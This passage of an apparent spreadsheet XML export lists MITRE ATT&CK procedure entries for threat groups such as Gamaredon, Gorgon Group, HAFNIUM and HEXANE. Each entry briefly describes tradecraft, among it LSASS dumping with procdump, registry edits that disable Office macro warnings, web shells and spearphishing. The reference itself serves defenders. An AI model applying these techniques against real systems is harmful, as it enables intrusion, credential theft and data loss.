    <t xml:space="preserve">[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.(Citation: Secureworks REvil September 2019)	</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has executed base64 encoded PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has conducted malicious spam (malspam) campaigns to gain access to victim's machines.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has staged and executed PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy [REvil](https://attack.mitre.org/software/S0496).(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) has used WinZip, likely to archive data prior to exfiltration.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) sent victims a lure document with a warning that asked victims to “enable content” for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) obfuscated shellcode used during execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) used PowerShell to download additional payloads and for execution.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) sent emails with malicious Microsoft Office documents attached.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has deployed scripts on compromised systems that automatically scan for interesting documents.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has obfuscated .NET executables by inserting junk code.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in &lt;code&gt;Microsoft.CSharp.CSharpCodeProvider&lt;/code&gt; class.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a &lt;code&gt;Microsoft.Office.Interop&lt;/code&gt; object.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to delete files and folders from victims' desktops and profiles.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has collected files from infected systems and uploaded them to a C2 server.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has collected Microsoft Office documents from mapped network drives.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also decoded base64-encoded source code of a downloader.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered macros which can tamper with Microsoft Office security settings.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered multiple domains to facilitate payload staging and C2.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has incorporated dynamic DNS domains in its infrastructure.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can transfer collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools can delete files used during an operation.(Citation: TrendMicro Gamaredon April 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.(Citation: ESET Gamaredon June 2020)(Citation: Unit 42 Gamaredon February 2022)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used &lt;code&gt;hidcon&lt;/code&gt; to run batch files in a hidden console window.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has downloaded additional malware and tools onto a compromised host.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has left taunting images and messages on the victims' desktops as proof of system access.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has tested connectivity between a compromised machine and a C2 server using  [Ping](https://attack.mitre.org/software/S0097) with commands such as `CSIDL_SYSTEM\cmd.exe /c ping -n 1`.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has attempted to get users to click on Office attachments with malicious macros embedded.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used legitimate process names to hide malware including &lt;code&gt;svchosst&lt;/code&gt;.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has removed security settings for VBA macro execution by changing registry values &lt;code&gt;HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\VBAWarnings&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Office\&amp;lt;version&amp;gt;\&amp;lt;product&amp;gt;\Security\AccessVBOM&lt;/code&gt;.(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used `mshta.exe` to execute malicious HTA files.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used &lt;code&gt;CreateProcess&lt;/code&gt; to launch additional malicious components.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has inserted malicious macros into existing documents, providing persistence when they are reopened. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the &lt;code&gt;/altvba&lt;/code&gt; option, once the Application.Startup event is received.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have contained an application to check performance of USB flash drives. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used malware to scan for removable drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used obfuscated PowerShell scripts for staging.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to enumerate processes on target hosts including Process Explorer.(Citation: Symantec Shuckworm January 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has created scheduled tasks to launch executables after a designated number of minutes have passed.(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047)'s malware can take screenshots of the compromised computer every minute.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered spearphishing emails with malicious attachments to targets.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's username to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has injected malicious macros into all Word and Excel documents on mapped network drives.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads.(Citation: Proofpoint RTF Injection) [Gamaredon Group](https://attack.mitre.org/groups/G0047) can also inject malicious macros or remote templates into documents already present on compromised systems.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered domains to stage payloads.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has embedded malicious macros in document templates, which executed VBScript. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also delivered Microsoft Outlook VBA projects with embedded macros.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used HTTP and HTTPS for C2 communications.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2 and download additional files. [Gamaredon Group](https://attack.mitre.org/groups/G0047)'s backdoor malware has also been written to a batch file.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used WMI to execute scripts used for discovery.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can decode contents from a payload that was Base64 encoded and write the contents to a file.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can attempt to disable security features in Microsoft Office and Windows Defender using the &lt;code&gt;taskkill&lt;/code&gt; command.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download additional files from C2 servers.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under &lt;code&gt;HKCU\Software\Microsoft\Office\&lt;/code&gt;.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can leverage the Windows API call, CreateProcessA(), for execution.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download a remote access tool, [ShiftyBug](https://attack.mitre.org/software/S0294), and inject into another process.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has obtained and used tools such as [QuasarRAT](https://attack.mitre.org/software/S0262) and [Remcos](https://attack.mitre.org/software/S0332).(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has used macros in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of remotely deleting files from victims.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of capturing keystrokes.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[Group5](https://attack.mitre.org/groups/G0043) disguised its malicious binaries with several layers of obfuscation, including encrypting the files.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of watching the victim's screen.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used 7-Zip and WinRAR to compress stolen files for exfiltration.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has interacted with Office 365 tenants to gather details regarding target's environments.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has created and granted privileges to domain accounts.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected e-mail addresses for users they intended to target.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has exfiltrated data to file sharing sites, including MEGA.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAFNIUM](https://attack.mitre.org/groups/G0125) has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065  to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)(Citation: Tarrask scheduled task)   </t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has obtained IP addresses for publicly-accessible Exchange servers.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAFNIUM](https://attack.mitre.org/groups/G0125) has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.(Citation: Microsoft HAFNIUM March 2020) </t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;procdump&lt;/code&gt; to dump the LSASS process memory.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.(Citation: FireEye Exchange Zero Days March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has stolen copies of the Active Directory database (NTDS.DIT).(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used TCP for C2.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the Exchange Power Shell module &lt;code&gt;Set-OabVirtualDirectoryPowerShell&lt;/code&gt; to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used web shells to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;rundll32&lt;/code&gt; to load malicious DLLs.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used ASCII encoding for C2 traffic.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has operated from leased virtual private servers (VPS) in the United States.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used open-source C2 frameworks, including Covenant.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has acquired web services for use in C2 and exfiltration.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAFNIUM](https://attack.mitre.org/groups/G0125) has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, [China Chopper](https://attack.mitre.org/software/S0020), and [ASPXSpy](https://attack.mitre.org/software/S0073).(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)(Citation: Tarrask scheduled task)   </t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogging tool to capture the window title.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used brute force attacks to compromise valid credentials.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `cmdkey` on victim machines to identify stored credentials.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a [Mimikatz](https://attack.mitre.org/software/S0002)-based tool and a PowerShell script to steal passwords from Google Chrome.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has set up custom DNS servers to send commands to compromised hosts via TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.(Citation: SecureWorks August 2019)(Citation: Dragos Hexane)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used compromised accounts to send spearphishing emails.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has established email accounts for use in domain registration including for ProtonMail addresses.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[HEXANE](https://attack.mitre.org/groups/G1001) has targeted executives, human resources staff, and IT personnel for spearphishing.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has identified specific potential victims at targeted organizations.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has identified executives, HR, and IT staff at victim organizations for further targeting.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has downloaded additional payloads and malicious scripts onto a compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used tools including [BITSAdmin](https://attack.mitre.org/software/S0190) to test internet connectivity from compromised hosts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogger named `kl.ps1`.(Citation: SecureWorks August 2019)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `net localgroup` to enumerate local groups.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.(Citation: SecureWorks August 2019)(Citation: Dragos Hexane)(Citation: ClearSky Siamesekitten August 2021)(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used Base64-encoded scripts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used password spraying attacks to obtain valid credentials.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.(Citation: SecureWorks August 2019)(Citation: Kaspersky APT Trends Q1 April 2021)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated processes on targeted systems.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used remote desktop sessions for lateral movement.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used `net view` to enumerate domain machines.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a scheduled task to establish persistence for a keylogger.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated programs installed on an infected machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has collected the hostname of a compromised machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used [Ping](https://attack.mitre.org/software/S0097) and `tracert` for network discovery.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used [netstat](https://attack.mitre.org/software/S0104) to monitor connections to specific ports.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `whoami` on compromised machines to identify the current user.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has acquired, and sometimes customized, open source tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Empire](https://attack.mitre.org/software/S0363), VNC remote access software, and DIG.net.(Citation: Kaspersky Lyceum October 2021)(Citation: SecureWorks August 2019)(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
